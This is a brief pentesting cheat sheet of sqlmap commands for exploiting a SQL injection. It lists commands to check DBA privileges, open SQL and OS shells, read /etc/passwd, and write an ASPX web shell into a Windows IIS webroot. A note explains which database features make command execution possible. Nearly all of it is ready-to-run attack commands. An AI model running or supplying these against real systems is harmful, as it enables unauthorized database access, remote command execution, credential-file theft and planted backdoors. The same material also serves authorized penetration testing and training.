# Check for DBA privs
--is-dba
# SQL shell (run raw SQL)
sqlmap -r req.txt --sql-shell --batch
# OS shell (if sqlmap can reach RCE path via DBMS features)
sqlmap -r req.txt --os-shell --batch
# Read/write files (DBMS-dependent permissions required)
sqlmap -r req.txt --file-read "/etc/passwd" --batch
sqlmap -r req.txt --file-write shell.aspx --file-dest "C:/inetpub/wwwroot/shell.aspx" --batch
Notes:
--os-shell/--file-*rely on DBMS-specific primitives (e.g., xp_cmdshell on MSSQL,COPY ... PROGRAMon Postgres,SELECT ... INTO OUTFILEon MySQL).